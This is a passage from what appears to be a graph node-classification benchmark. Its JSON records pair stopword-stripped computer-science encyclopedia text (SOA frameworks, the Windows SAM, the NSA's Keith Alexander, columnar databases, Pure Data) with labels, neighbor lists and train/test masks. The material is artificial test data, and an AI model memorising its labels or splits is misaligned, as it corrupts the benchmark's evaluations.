dramatically reduce time taken implement deliver working processes soaif general-purpose infrastructure platform lets developers business analysts create deploy manage change processes within across enterprise soaifs unique requirements tools infrastructure levels typically provided single current technology platform include addressing requirements soaif lets users quickly respond changes integrate operations efficiently regardless platform language database application enterprise processes usually distributed across multiple applications hardware/software systems processes also event-based sense subprocesses linked series events example depletion inventory manufacturer may lead event-trigger automatically generated propagated one suppliers replenish depleted inventory items current bpm solutions control processes centralized hub changes applications additions new applications require modifications centralized hub data exchanged applications needs traverse central hub type topology restriction inefficient inflexible leads bottlenecks overcome limitation framework tries integrate enterprise processes needs fully distributed across network within enterprise framework must also symmetric implies event-based infrastructure software tools need run machines within enterprise support data exchange messaging existing enterprise standards becomes essential soaif since content needs exchanged partners xml messages documents desired format since businesses want leverage existing infrastructures soaif needs easily support multiple standards soaif able offer high degree reliability platform support broad range processes span increasing number applications corporations partners eliminate single points failure maximize performance fully distributed architecture becomes essential soaif needs fully distributed maximum performance scalability distributed computing environment becomes necessary restrict scope interactions partners conduct corporate infrastructure becomes necessary allow customization interactions partner providing different security roles per-user per-service basis requires security model incorporates users web services general enterprise services ’ fully distributed fault-tolerant soaif infrastructure security model needs based existing standards tools support certificate authentication user services level soaif needs provide single dashboard visibility organization ’ entire distributed computing environment platform incorporate visual implementation-process-composition tools together infrastructure-level support instantly deploy modeled implementation-level processes across distributed enterprise network visual composition tools need service-oriented sense able directly manipulate higher-level coarse-grained implementation processes first-class objects also provide visual display programming constructs able map directly naturally deployable processes critical problem deploying distributed systems monitoring debugging concurrently running processes soaif provide native support tracing logging monitoring process service across distributed environment another challenge responding changing requirements soaif provide support incremental on-the-fly modification service-based flows implement processes among critical features expected soaif since lets analysts visually change instantly redeploy processes address dynamic requirements changes implemented within soaif abstracting concepts relating lower-level middleware tools applications levels users simply specify service replaced another running service often another machine soaif dynamically reroutes data new service setting new underlying middleware constructs topics queues example on-the-fly allows implementation changed without stopping current process much way hardware upgraded mainframe system without interruption operations essential elements soaif include design-time run-time infrastructure together service-oriented tools deploying distributed processes implementation flows core infrastructure soaif typically provided enterprise service bus esb addresses challenges composing deploying managing distributed service-based enterprise applications esb incorporates standards-based enterprise-class messaging backbone together enhanced systems connectivity using web services java ee .net framework standards one approach contributes optimal soa implementation use enterprise service bus esb provide infrastructural element distributed services network esb approach integration considers systems discrete distributed services connect via asynchronous message-oriented communications infrastructure message-oriented infrastructure allows loosely coupled document-oriented exchanges independent systems esbs provides critical infrastructure components simplify scale integration approaches esbs however provide required integration meet high-level business requirements esbs also provide guarantees loose coupling coarse granularity meet evolving service-oriented needs implementing esbs meet soa requirements require addition extra functionality compose fine-grained atomic services coarse-grained business services provide policy-driven managed secure service interactions esb links individual enterprises together extended process efficiency across supply chain allowing become flexible adaptable rapidly changing requirements esb lets enterprise leverage previous investments supporting deployment processes existing software hardware infrastructure core underlying infrastructure soaif esbs offer several unique business technical advantages business process management bpm considers systems assets activities tasks participate well-coordinated centrally orchestrated business processes traditionally challenge bpm possible construct processes achieve integration goals enterprises typically use bpm tools design time modeling processes used processes rarely processes actually environment bpm solutions craft orchestrated processes composed fine-grained services ’ contain runtime environment necessary loosely coupled asynchronous service interactions least bpm solution must used conjunction loosely coupled integration approach make business processes runtime activities coordinate integration thus bpm solutions sufficient meet soa requirements service-oriented integration soi approach uses architectural guiding principles services orientation construct ecosystem services business users dynamically combine compose higher-level processes meet continuously evolving changing business requirements soi approaches transcend brittle tightly coupled eai business-to-business integration approaches mandating separation consumer service producer service thus enforcing critical aspect loose coupling required allow integration scenario evolve automatically meet business requirements soi provides guidance build right services meet current business requirements provide means execute services effective scalable manner guarantee long-running interactions esbs implement standardized interfaces communication connectivity transformation security portability supported standards include modern esb implementations typically support development multiple languages combined inherently portable esb infrastructure makes esb true multi-language multiplatform enterprise backbone ideal foundation soaif several modern esbs implement symmetric distributed architecture peer-messaging servers run multiple nodes enterprise network providing highly scalable reliable distributed messaging platform single point failure modern esb architectures combine benefits centralized control distributed parallel data flow giving application developers ultimate flexibility defining network topology choice route data directly optimally services ensuring data flowing services always traverse central point network optimizes peer-to-peer network performance instance one process requires data exchanges new york boston well san francisco los angeles two flows data ’ necessarily traverse messaging hub located chicago often case enterprise cross-enterprise deployments instead efficiency dictates setting direct data flow connections peer nodes network service-oriented tools enable composition distributed applications one services web services general enterprise services typically runs separate process services may written language communicate via xml messages allows service-oriented tools within soaif compose flexible easy-to-modify systems service-oriented processes deployed soaif composed coarse-grained web services ideally suited easy change replacement abstracting details message routing service implementations service-oriented tools decouple enable running processes modified on-the-fly simple service replacement addition tools framework within soaif supports run-time deployment services allowing changed processes deployed instantly across network experience significantly reduces solution deployment costs compared traditional broker-based solutions esb defines comprehensive security system giving administrators full control services executed esbs provide ability set several security attributes service provide administrative tools configure security settings distributed esb infrastructure across network esbs include native service-level support run-time monitoring tracing logging services monitored instantly using visual tools within soaif trace levels dynamically changed within existing services running across network debug logs routed software tools node features greatly simplify development deployment debugging distributed applications running across soaif",
    "neighbors": [
      2501,
      9285,
      4107,
      9677,
      3573,
      3413,
      502,
      8597,
      7802,
      6651,
      5373
    ],
    "mask": "Test"
  },
  {
    "node_id": 7754,
    "label": 2,
    "text": "Security_Account_Manager:security account manager security account manager sam often security accounts manager database file windows xp windows vista windows 7 8.1 10 stores users passwords used authenticate local remote users beginning windows 2000 sp4 active directory authenticates remote users sam uses cryptographic measures prevent unauthenticated users accessing system user passwords stored hashed format registry hive either lm hash ntlm hash file found codice_1 mounted codice_2 attempt improve security sam database offline software cracking microsoft introduced syskey function windows nt 4.0 syskey enabled on-disk copy sam file partially encrypted password hash values local accounts stored sam encrypted key usually also referred syskey enabled running codice_3 program since hash function one-way provides measure security storage passwords case online attacks possible simply copy sam file another location sam file moved copied windows running since windows kernel obtains keeps exclusive filesystem lock sam file release lock operating system shut blue screen death exception thrown however in-memory copy contents sam dumped using various techniques including pwdump making password hashes available offline brute-force attack lm hash compromised protocol replaced ntlm hash versions windows configured disable creation storage valid lm hashes user changes password windows vista later versions windows disable lm hash default note enabling setting immediately clear lm hash values sam rather enables additional check password change operations instead store dummy value location sam database lm hash otherwise stored dummy value relationship user password value used user accounts windows nt 3.51 nt 4.0 2000 attack devised bypass local authentication system sam file deleted hard drive e.g mounting windows os volume alternate operating system attacker could log account password flaw corrected windows xp shows error message shuts computer however exist software utilities aforementioned methodology using either emulated virtual drive boot disk usually unix/linux another copy windows like windows preinstallation environment based environment mount local drive housing active ntfs partition using programmed software routines function calls within assigned memory stacks isolate sam file windows nt system installation directory structure default codice_1 depending particular software utility used removes password hashes stored user accounts entirety cases modify user account passwords directly environment software highly pragmatic beneficial use password clearing account recovering utility individuals lost forgotten windows account passwords well possible use malicious software security bypassing utility essentially granting user enough ability experience familiarity cracking utility software security routines windows nt kernel well offline immediate local access target computer capability entirely bypass remove windows account passwords potential target computer recently microsoft released utility called locksmith part msdart msdart freely available end-users however",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      1671,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      9910,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      8976,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      1844,
      9525,
      11572,
      10039,
      6972,
      8513,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      7556,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      7087,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      4552,
      969,
      6088,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 7755,
    "label": 2,
    "text": "IA-32_Execution_Layer:ia-32 execution layer ia-32 execution layer ia-32 el software emulator form software driver improves performance 32-bit applications running 64-bit intel itanium-based systems particularly running linux windows server 2003 included windows 2003 sp1 later linux distributions itanium ia-32 el bypasses slow x86 hardware emulation available pre-montecito itanium models ia-32 el used two-phase later three-phase approach initially quickly translated every piece code basic block level adding certain instrumentation detecting hot code hot code dynamically optimized super-block level optimized translated code replaced cold code fly later interpretation engine added allowed avoid altogether translation code executed times cold non-optimized translation became thus second phase hot optimized translation became third phase ia-32 execution layer supported self-modified code could even optimize quite well part software lgpl part intel proprietary license",
    "neighbors": [
      704,
      7941,
      9959,
      6730,
      8315,
      4622,
      7983,
      499,
      1972,
      5523,
      7134,
      823,
      8795,
      6971,
      1085,
      3294,
      6911
    ],
    "mask": "None"
  },
  {
    "node_id": 7756,
    "label": 9,
    "text": "List_of_abstractions_(computer_science):list abstractions computer science list contains abstractions used computer programming",
    "neighbors": [
      655,
      10737,
      10581,
      2901,
      3767,
      11674,
      2780
    ],
    "mask": "None"
  },
  {
    "node_id": 7757,
    "label": 5,
    "text": "NISO_Circulation_Interchange_Protocol:niso circulation interchange protocol niso circulation interchange protocol ncip protocol limited exchange messages among computer-based applications enable perform functions necessary lend borrow items provide controlled access electronic resources facilitate cooperative management functions released may 2001 approved october 17 2002 ansi/niso z39.83-2002 ncip niso draft standard trial use protocol defines repertoire messages associated rules syntax semantics use applications perform functions necessary lend items provide controlled access electronic resources facilitate co-operative management functions intended address conditions application applications initiate lending items control access must acquire transmit information user items and/or access essential successful conclusion function",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 7758,
    "label": 3,
    "text": "Woody_Poco:woody poco player controls old wooden figure named poco hero lived harmony humans many years poco journey find fairy teaches people get back friendly wooden dolls enemies encountered game strange creatures bothersome old men player attacks using fists players steal items store stealing player appearance changed resemble thief hotels pawn shops longer admit player remainder game theft taken place player equip one hand weapon passive tool lamp dark areas player buy gear sleep hotels gamble steal bribe non-player characters player needs eat prevent hunger recharging health based food level features in-game clock day/night cycles four seasons color changes reflect time day season",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 7759,
    "label": 4,
    "text": "Keith_B._Alexander:keith b. alexander keith brian alexander born december 2 1951 retired four-star general united states army served director national security agency dirnsa chief central security service chcss commander united states cyber command previously served deputy chief staff g-2 united states army 2003 2005 assumed positions director national security agency chief central security service august 1 2005 additional duties commander united states cyber command may 21 2010 alexander announced retirement october 16 2013 retirement date march 28 2014 may 2014 alexander founded ironnet cybersecurity private-sector cybersecurity firm based fulton maryland alexander born december 2 1951 syracuse new york son charlotte l. colvin donald henry alexander raised onondaga hill new york suburb syracuse paperboy post-standard attended westhill senior high school ran track alexander attended united states military academy west point class three future four-star generals david petraeus martin dempsey walter l. sharp graduation april 1974 alexander married deborah lynn douglas classmate high school grew near family onondaga hill four daughters alexander entered active duty west point intending serve five years alexander military education includes armor officer basic course military intelligence officer advanced course united states army command general staff college national war college alexander worked signals intelligence number secret national security agency bases united states germany earned master science business administration 1978 boston university master science systems technology electronic warfare master science physics 1983 naval postgraduate school master science national security strategy national defense university rose quickly military ranks due expertise advanced technology competency administration alexander assignments include deputy chief staff dcs g-2 headquarters department army washington d.c. 2003 2005 commanding general united states army intelligence security command fort belvoir virginia 2001 2003 director intelligence j-2 united states central command macdill air force base florida 1998 2001 deputy director intelligence j-2 joint chiefs staff 1997 1998 alexander served variety command assignments germany united states include tours commander border field office 511th mi battalion 66th mi group 336th army security agency company 525th mi group 204th mi battalion 525th military intelligence brigade additionally alexander held key staff assignments deputy director operations officer executive officer 522nd mi battalion 2nd armored division g-2 1st armored division germany gulf war operation desert shield operation desert storm saudi arabia also served afghanistan peace keeping mission army deputy chief staff intelligence alexander headed army intelligence security command 2001 charge 10,700 spies eavesdroppers worldwide words james bamford wrote biography wired alexander rest american intelligence community suffered devastating defeat surprised attacks 9/11 alexander reaction order intercept operators begin monitor email phone calls american citizens unrelated terrorist threats including personal calls journalists 2003 alexander named deputy chief staff intelligence united states army 205th mi brigade involved abu ghraib torture prisoner abuse baghdad iraq part v corps us alexander command testifying senate armed services committee alexander called abuse totally reprehensible described perpetrators group undisciplined mp soldiers mary louise kelly interviewed later npr said outside chain command oversaw interrogations iraq alexander able survive reputation intact 2004 along alberto gonzales others george w. bush administration alexander presented memorandum sought justify treatment deemed unlawful enemy combatants june 2013 national security agency revealed whistle-blower edward snowden secretly spying american people fisa-approved surveillance programs prism xkeyscore october 16 2013 publicly announced alexander deputy chris inglis leaving nsa april 13 2016 president obama announced alexander member commission enhancing national cybersecurity alexander became three-star general 2005 donald rumsfeld secretary defense named director national security agency according bamford alexander deceived house intelligence committee agency involved nsa warrantless wiretapping also period alexander oversaw implementation real time regional gateway iraq nsa data collection program consisted gathering electronic communication storing searching otherwise analyzing former senior u.s. intelligence agent described alexander program rather look single needle haystack approach 'let collect whole haystack collect tag store ... whatever want go searching 2008 regional gateway effective providing information iraqi insurgents eluded less comprehensive techniques collect strategy introduced keith alexander believed glenn greenwald guardian model comprehensive world-wide mass archiving communications nsa become engaged 2013 according siobhan gorman wall street journal government official stated alexander offered resign 2013 global surveillance disclosures first broke june 2013 obama administration asked alexander confirmed united states senate appointment rank general may 7 2010 officially promoted rank ceremony may 21 2010 alexander assumed command united states cyber command ceremony made four-star general alexander delivered keynote address black hat usa july 2013 organizers describe alexander advocate battlefield visualization 'data fusion useful intelligence provided quote alexander gave comprehensive interview career spanned 17,000 words 8 may 2014 australian financial review journalist christopher joye subsequently cited edward snowden full transcript covers nsa operations snowden metadata debates encryption controversies chinese russian spying published online snowden alexander told joye suspect russian intelligence driving understand well 're going let things benefit russia stand help improve snowden credibility wired magazine said afr interview alexander showed defending stock-piling zero-days wall street journal media focused alexander claims snowden working russian intelligence july 2012 response question jeff moss founder def con hacker convention ... nsa really keep file everyone alexander replied n't absolutely anybody would tell 're keeping files dossiers american people knows true march 2012 response questions representative hank johnson united states congress hearing allegations made former nsa officials nsa engages collection voice digital information u.s. citizens alexander said despite allegations james bashford wired magazine nsa collect data july 9 2012 asked member press large data center utah used store data american citizens alexander stated ca n't go details utah data center n't hold data u.s citizens def con 2012 alexander keynote speaker question answers session response question nsa really keep file everyone see mine alexander replied job foreign intelligence would want weave story millions hundreds millions dossiers people absolutely false ... perspective absolute nonsense june 6 2013 day snowden revelations then-director national intelligence james clapper released statement admitting nsa collects telephony metadata millions americans telephone calls metadata information included originating terminating telephone number telephone calling card number imei number time duration phone calls andy greenberg forbes said nsa officials including alexander years 2012 2013 publicly denied—often carefully hedged words—participating kind snooping americans since become nearly undeniable september 2013 alexander asked senator mark udall goal nsa collect phone records americans alexander replied alexander announced retirement october 16 2013 retirement date march 28 2014 replacement u.s. navy vice admiral michael s. rogers may 2014 retirement nsa alexander founded ironnet cybersecurity ironnet provides cybersecurity coverage private-sector companies using irondefense program team cybersecurity analysts experts company headquartered fulton maryland offices frederick maryland mclean virginia new york city october 2015 ironnet received 32.5 million funding trident capital cybersecurity forgepoint capital kleiner perkins caufield byers series investment may 2018 ironnet raised additional 78 million round led c5 capital alongside existing investors forgepoint capital kleiner perkins caufield byers alexander maintains role ceo ironnet today alexander inducted nps hall fame 2013 fall 2014 alexander told public forum someone else claimed 9,000 irs refund name thieves used identity apply 20 credit cards",
    "neighbors": [
      6017,
      3843,
      1930,
      766,
      1169,
      9233,
      8726,
      1189,
      3495,
      9517,
      1838,
      1330,
      10935,
      5308,
      10305,
      1986,
      6343,
      6344,
      11335,
      4813,
      7119,
      7887,
      3154,
      8276,
      7893,
      4566,
      9688,
      991,
      7137,
      2275,
      3305,
      7145,
      2419,
      6005,
      6136,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 7760,
    "label": 2,
    "text": "Win32_Thread_Information_Block:win32 thread information block computing win32 thread information block tib data structure win32 x86 stores information currently running thread structure also known thread environment block teb tib officially undocumented windows 9x windows nt series ddk includes struct nt_tib winnt.h documents subsystem independent part wine includes header declarations extended subsystem-specific part tib yet many win32 programs use undocumented fields effectively part api first field particular directly referenced code produced microsoft compiler tib used get lot information process without calling win32 api examples include emulating getlasterror getversion pointer peb one obtain access import tables iat process startup arguments image name etc accessed fs segment register operating 32 bits gs 64 bits fs 32-bit gs 64-bit maps tib embedded data block known tdb thread data base tib contains thread-specific exception handling chain pointer tls thread local storage thread local storage c local storage tib current thread accessed offset segment register fs x86 gs x64 common access tib fields offset fs 0 rather first getting linear self-referencing pointer stored fs 0x18 pointer used pointer arithmetics cast struct pointer example c inlined-assembly 32-bit x86",
    "neighbors": [
      1632,
      3235,
      5040,
      499,
      6868,
      3990,
      9911,
      5176,
      6751
    ],
    "mask": "Test"
  },
  {
    "node_id": 7761,
    "label": 5,
    "text": "Bitflu:bitflu bitflu open-source bittorrent client adrian ulrich available unix-like systems written perl bitflu received good reviews open-source software sites blogs praising lightweight feature-complete even bitflu seems largely unknown reportedly commanding 0.000025 total bittorrent traffic according one reviewer could due non-automated relatively elaborated install procedure could putting majority users ca n't anything complicated click-next-until-finish install",
    "neighbors": [
      4229,
      8582,
      4490,
      5397,
      11029,
      11413,
      10522,
      3366,
      10924,
      7983,
      3770,
      708,
      3792,
      3676,
      5085,
      3428,
      3813,
      7921,
      10995,
      5749
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7762,
    "label": 4,
    "text": "Polyinstantiation:polyinstantiation polyinstantiation computer science concept type class database row otherwise instantiated multiple independent instances objects copies may also indicate case database polyinstantiation two different instances name identifier primary key operating system security polyinstantiation concept creating user process specific view shared resource i.e process affect process b writing malicious code shared resource unix directory /tmp polyinstantiation shared resources similar goals process isolation application virtual memory processes assigned isolated virtual address space prevent process writing memory space process b databases polyinstantiation database-related sql structured query language terminology allows relation contain multiple rows primary key multiple instances distinguished security levels occurs mandatory policy depending security level established one record contains sensitive information one user see record information depending his/her level confidentiality previously dictated company policy consider following table primary key name λ x security level although useful security standpoint polyinstantiation raises several problems cryptography polyinstantiation existence cryptographic key one secure physical location",
    "neighbors": [
      6087,
      4075,
      10413,
      7983,
      11539,
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 7763,
    "label": 4,
    "text": "Spam_Reader:spam reader spam reader free anti-spam add-on microsoft outlook produced shareware license program uses content filtering based bayesian spam filtering algorithm whitelist blacklist techniques additional spam signs like embedded images internet attached executed files junk text program supports pop3 imap http microsoft exchange microsoft exchange program works default mailbox also http mailboxes limited supported outlook program add-on automatically integrates outlook workspace white list program uses white list technology guarantees messages user regular correspondents blocked spam even contents look like spam white list may include names addresses entire domains list automatically created first program execution scanning user address book contacts folder saved sent messages program automatically updates white list adding information recipients outgoing messages black list program contains contacts email addresses receive spam unwanted messages spam reader consider message sender list spam black list items may names email addresses entire domains contain wildcards safe recipients list list contains email address user ca n't receive spam messages sent addresses always treated legitimate messages bayesian spam filter spam filtering based bayesian approach using algorithm program determines score corresponding probability particular message spam score used decide whether message spam regular updates self-training option make filtering algorithm flexible custom filter adjust filtering rules user personal needs possible define custom spam not-spam dictionaries message contains word phrase spam dictionary considered spam messages containing word phrases not-spam dictionary directed inbox without anti-spam filtering program uses special algorithm interaction microsoft outlook rules algorithm allows user set order executing outlook rules spam reader prevents chaotic movement spam messages spam folder destination folder outlook rule case spam messages match rule",
    "neighbors": [
      8747,
      6797,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 7764,
    "label": 4,
    "text": "Anti-Spam_SMTP_Proxy:anti-spam smtp proxy anti-spam smtp proxy assp open-source perl based platform-independent transparent smtp proxy server assp features",
    "neighbors": [
      5249,
      5253,
      8582,
      3988,
      10906,
      8224,
      10276,
      6313,
      8747,
      1837,
      4398,
      7983,
      4272,
      9014,
      4294,
      10696,
      11610,
      6492,
      7518,
      11492,
      2281,
      6762,
      5612,
      8941,
      3837
    ],
    "mask": "Test"
  },
  {
    "node_id": 7765,
    "label": 5,
    "text": "MMS_Architecture:mms architecture mms architecture set standards used multimedia messaging service mobile networks standards prepared 3gpp standard consists number interfaces components found mobile network mm1 interface mobile station ms mmsc mm1 used following actions mm1 interface based wap protocol includes pap notifications transformed sms wap gateway notifications mm2 interface mms relay mms-r mms storage database two components mmsc platform mm3 interface mmsc external servers email server sms centers smsc interface typically uses tcp/ip based protocols e.g simple mail transfer protocol smtp generally responsibility mmsc transformation mms multi-part binary data mime format email direction mm3 used following actions mm4 interface used exchange messages two different mmscs mmscs generally located two distinct mobile networks interface also known mms interface wireless application protocol wap open mobile alliance oma standards mm5 interface mmsc network elements like hlr domain name server communication mm5 interface generally fetch routing information mm5 defined 3gpp ts 23.140 simple reference mobile application part mm7 interface mmsc value-added service provider vasp mm7 interface used send mms 3rd party providers e.g. bank sending statement advertiser sending publicity based soap attachments using http transport protocol http request shall post message mime encapsulates soap envelope encoded attachments soap envelope xml tags mm7 protocol data mm11 specified oma sti standard transcoding interface 1.0 mm11 designed ensure compatibility transcoders mmscs integration transcoder without using mm11 possible implementing transcoder proxy server placing transcoder mm1 interface user equipment mmsc messages transparently transcoded possible disadvantage implementation transcoders typically licensed transactions per second transactions sent transcoder rather marked allow adaptations",
    "neighbors": [
      5704,
      5875,
      10486,
      479
    ],
    "mask": "Train"
  },
  {
    "node_id": 7766,
    "label": 9,
    "text": "David_H._Munro:david h. munro david herbert munro born april 29 1955 oakland california physicist lawrence livermore national laboratory llnl created programming language yorick well scientific graphics library gist munro earned b.s caltech 1976 ph.d. massachusetts institute technology 1980 joined llnl 1980 primarily focused research laser fusion received excellence plasma physics award american physical society 1995",
    "neighbors": [
      8262,
      2135
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7767,
    "label": 1,
    "text": "Column-oriented_DBMS:column-oriented dbms column-oriented dbms columnar database management system database management system dbms stores data tables column rather row practical use column store versus row store differs little relational dbms world columnar row databases use traditional database query languages like sql load data perform queries row columnar databases become backbone system serve data common extract transform load etl data visualization tools however storing data columns rather rows database precisely access data needs answer query rather scanning discarding unwanted data rows query performance increased certain workloads relational database management system provides data represents two-dimensional table columns rows example database might table simple table includes employee identifier empid name fields lastname firstname salary salary two-dimensional format abstraction actual implementation storage hardware requires data serialized one form another expensive operations involving hard disks seeks order improve overall performance related data stored fashion minimize number seeks known locality reference basic concept appears number different contexts hard disks organized series blocks fixed size typically enough store several rows table organizing table data rows fit within blocks grouping related rows onto sequential blocks number blocks need read sought minimized many cases along number seeks survey pinnecke et al covers techniques column-/row hybridization 2017 common method storing table serialize row data like data inserted table assigned internal id codice_1 used internally system refer data case records sequential codice_1s independent user-assigned codice_3 example dbms uses short integers store codice_1s practice larger numbers 64-bit 128-bit normally used row-based systems designed efficiently return data entire row record operations possible matches common use-case system attempting retrieve information particular object say contact information user rolodex system product information online shopping system storing record data single block disk along related records system quickly retrieve records minimum disk operations row-based systems efficient performing set-wide operations whole table opposed small number specific records instance order find records example table salaries 40,000 50,000 dbms would fully scan entire table looking matching records example table shown likely fit single disk block table even hundred rows would multiple disk operations would needed retrieve data examine improve performance sorts operations common generally point using dbms dbmss support use database indexes store values set columns along codice_1 pointers back original table index salary column would look something like store single pieces data rather entire rows indexes generally much smaller main table stores scanning smaller set data reduces number disk operations index heavily used dramatically reduce time common operations however maintaining indexes adds overhead system especially new data written database records need stored main table attached indexes updated well main reason indexes dramatically improve performance large datasets database indexes one columns typically sorted value makes range queries operations like find records salaries 40,000 50,000 example fast lower time-complexity number row-oriented databases designed fit entirely ram in-memory database systems depend disk operations equal-time access entire dataset reduces need indexes requires amount operations fully scan original data complete index typical aggregation purposes systems may therefore simpler smaller manage databases fit memory column-oriented database serializes values column together values next column example table data would stored fashion layout one columns closely matches structure index row-based system may cause confusion lead mistaken belief column-oriented store really row-store index every column however mapping data differs dramatically row-oriented indexed system primary key rowid mapped indexed data column-oriented system primary key data mapped rowids may seem subtle difference seen common modification store whether column-oriented system efficient operation depends heavily workload automated operations retrieve data given object entire row slower row-based system retrieve row single disk read whereas numerous disk operations collect data multiple columns required columnar database however whole-row operations generally rare majority cases limited subset data retrieved rolodex application instance collecting first last names many rows build list contacts far common reading data single address even true writing data database especially data tends sparse many optional columns reason column stores demonstrated excellent real-world performance spite many theoretical disadvantages partitioning indexing caching views olap cubes transactional systems write-ahead logging multiversion concurrency control dramatically affect physical organization either system said online transaction processing oltp -focused rdbms systems row-oriented online analytical processing olap -focused systems balance row-oriented column-oriented comparisons row-oriented column-oriented databases typically concerned efficiency hard-disk access given workload seek time incredibly long compared bottlenecks computers example typical serial ata sata hard drive average seek time 16 22 milliseconds dram access intel core i7 processor takes average 60 nanoseconds nearly 400,000 times fast clearly disk access major bottleneck handling big data columnar databases boost performance reducing amount data needs read disk efficiently compressing similar columnar data reading data necessary answer query practice columnar databases well-suited olap-like workloads e.g. data warehouses typically involve highly complex queries data possibly petabytes however work must done write data columnar database transactions inserts must separated columns compressed stored making less suited oltp workloads row-oriented databases well-suited oltp-like workloads heavily loaded interactive transactions example retrieving data single row efficient data located single location minimizing disk seeks row-oriented architectures however column-oriented systems developed hybrids capable oltp olap operations oltp constraints column-oriented systems face mediated using amongst qualities in-memory data storage column-oriented systems suitable olap oltp roles effectively reduce total data footprint removing need separate systems column data uniform type therefore opportunities storage size optimizations available column-oriented data available row-oriented data example many popular modern compression schemes lzw run-length encoding make use similarity adjacent data compress missing values repeated values common clinical data represented two-bit marker techniques may used row-oriented data typical implementation achieve less effective results improve compression sorting rows also help example using bitmap indexes sorting improve compression order magnitude maximize compression benefits lexicographical order respect run-length encoding best use low-cardinality columns first sort keys example given table columns sex age name would best sort first value sex cardinality two age cardinality 150 name columnar compression achieves reduction disk space expense efficiency retrieval greater adjacent compression achieved difficult random-access may become data might need uncompressed read therefore column-oriented architectures sometimes enriched additional mechanisms aimed minimizing need access compressed data column stores transposed files implemented early days dbms development taxir first application column-oriented database storage system focus information-retrieval biology 1969 clinical data patient records many attributes could analyzed processed 1975 time-oriented database system tods statistics canada implemented rapid system 1976 used processing retrieval canadian census population housing well several statistical applications rapid shared statistical organizations throughout world used widely 1980s continued used statistics canada 1990s another column-oriented database scss later column-oriented database packages included since 2004 additional open source commercial implementations monetdb released open-source license september 30 2004 followed closely defunct c-store c-store university project eventually team member michael stonebraker staying led vertica co-founded 2005 monetdb-related x100 project evolved vectorwise druid column-oriented data store open-sourced late 2012 used numerous organizations",
    "neighbors": [
      5632,
      3,
      8201,
      2068,
      1049,
      5658,
      7710,
      5151,
      10286,
      10294,
      4155,
      11324,
      9286,
      10326,
      4696,
      8291,
      9828,
      10340,
      2669,
      2163,
      1142,
      1146,
      3196,
      2688,
      3219,
      10389,
      1178,
      1697,
      5794,
      9893,
      4263,
      4781,
      10413,
      9397,
      7868,
      11457,
      5320,
      4811,
      2780,
      10471,
      747,
      6383,
      3315,
      6395,
      6920,
      11530,
      10511,
      6418,
      8979,
      7446,
      5403,
      2344,
      10048,
      2369,
      5953,
      5960,
      5450,
      6479,
      2901,
      11098,
      11111,
      9075,
      10632,
      2456,
      11161,
      9631,
      9634,
      10661,
      7080,
      3001,
      5051,
      3004,
      9147,
      11203,
      6085,
      2512,
      987,
      990,
      4065,
      7650,
      6124,
      2544,
      10737,
      4598,
      4604
    ],
    "mask": "Test"
  },
  {
    "node_id": 7768,
    "label": 9,
    "text": "SIM.JS:sim.js sim.js event-based discrete-event simulation library based standard javascript library written order enable simulation within standard browsers utilizing web technology sim.js supports entities resources facility buffers stores communication via timers events messages statistics data series time series population statistics sim.js distribution contains tutorials in-depth documentation large number examples sim.js released open source software lgpl license first version released january 2011 several examples bundled library download trafficlight simulation standard simulation problem may simulated within example",
    "neighbors": [
      5612,
      3462,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 7769,
    "label": 9,
    "text": "Pure_Data:pure data pure data pd visual programming language developed miller puckette 1990s creating interactive computer music multimedia works puckette main author program pd open-source project large developer base working new extensions released license similar bsd license runs gnu/linux ios android windows ports exist freebsd irix pd similar scope design puckette original max program developed ircam degree interoperable max/msp commercial predecessor max language may collectively discussed members patcher family languages addition graphics environment multimedia gem external externals designed work like pure data packet pidip linux framestein windows gridflow n-dimensional matrix processing linux windows possible create manipulate video opengl graphics images etc. realtime extensive possibilities interactivity audio external sensors etc pd natively designed enable live collaboration across networks internet allowing musicians connected via lan even disparate parts globe create music together real time pd uses fudi networking protocol pure data max examples dataflow programming languages languages functions objects linked patched together graphical environment models flow control audio unlike original version max however pd always designed control-rate audio processing host central processing unit cpu rather offloading sound synthesis signal processing digital signal processor dsp board ariel ispw used max/fts pd code forms basis david zicarelli msp extensions max language software audio processing like max pd modular code base externals objects used building blocks programs written software makes program arbitrarily extensible public api encourages developers add control audio routines c programming language help externals python scheme lua tcl many others however pd also programming language modular reusable units code written natively pd called patches abstractions used standalone programs freely shared among pd user community programming skill required use pd effectively like max pd dataflow programming language dsp software two primary rates data passed sample audio rate usually 44,100 samples per second control rate 1 block per 64 samples control messages audio signals generally flow top screen bottom objects connected via inlets outlets pd supports four basic types text entities messages objects atoms comments atoms basic unit data pd consist either float symbol pointer data structure pd numbers stored 32-bit floats messages composed one atoms provide instructions objects special type message null content called bang used initiate events push data flow much like pushing button pd native objects range basic mathematical logical bitwise operators found every programming language general specialized audio-rate dsp functions designated tilde symbol wavetable oscillators fast fourier transform fft~ range standard filters data loaded file read audio board midi via open sound control osc firewire usb network connection generated fly stored tables read back used audio signals control data one key innovations pd predecessors introduction graphical data structures used large variety ways composing musical scores sequencing events creating visuals 